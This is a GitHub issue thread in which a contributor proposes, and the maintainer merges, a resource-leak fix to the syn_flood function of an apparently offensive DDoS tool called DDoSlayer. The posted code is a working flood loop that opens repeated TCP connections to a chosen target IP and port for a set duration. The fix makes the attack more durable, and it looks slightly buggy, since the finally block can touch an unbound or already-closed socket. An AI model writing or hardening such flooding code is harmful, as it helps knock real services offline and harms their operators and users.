### ISSUE TITLE
Resource Leaks

### ISSUE THREAD

**Issue by dad84** [blackhatethicalhacking/DDoSlayer#16]
The syn_flood and http_flood functions open a new socket for each packet sent but do not close it properly in case of an exception, leading to potential resource leaks.

**Comment by blackhatethicalhacking** [comment]
Hello @dad84 how do u mean, can you explain a bit more how you see the leak - so we can check it out.

**Comment by dad84** [comment]
You should make sure that the socket is closed regardless of whether an exception is raised. You can use a `finally` block to ensure that the socket is closed properly. 

`# Function to perform the SYN Flood attack
def syn_flood(ip, port, duration):
    sent = 0
    timeout = time.time() + int(duration)

    while True:
        try:
            if time.time() > timeout:
                break
            else:
                pass
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((ip, port))
            sent += 1
            print(f"SYN Packets sent: {sent} to target: {ip}")
            sock.close()
        except OSError:
            pass
        except KeyboardInterrupt:
            print("\n[*] Attack stopped.")
            sys.exit()
        finally:
            sock.close()  # Make sure to close the socket in all cases
`

**Comment by dad84** [comment]
**Socket Creation**: Inside the loop, a new socket is created with sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM).

**Socket Usage**: The socket is used to send packets for the attack.

**Exceptions**: If an exception occurs (for example, if the connection fails), the code jumps into the except block.

**No Socket Closure in Exception Handling**: However, in the except block, the socket is not closed. This is the crux of the issue.

Potential Leaks: If the exception occurs, the socket remains open and not properly closed. Since the loop continues, the code will repeatedly create new sockets for each iteration, leading to a potential resource leak.

Finally Block: The finally block is where you should ensure that the socket is closed, regardless of whether an exception occurred or not. This guarantees that the socket is closed properly and resources are released.

**Comment by blackhatethicalhacking** [comment]
Merged, thanks @dad84
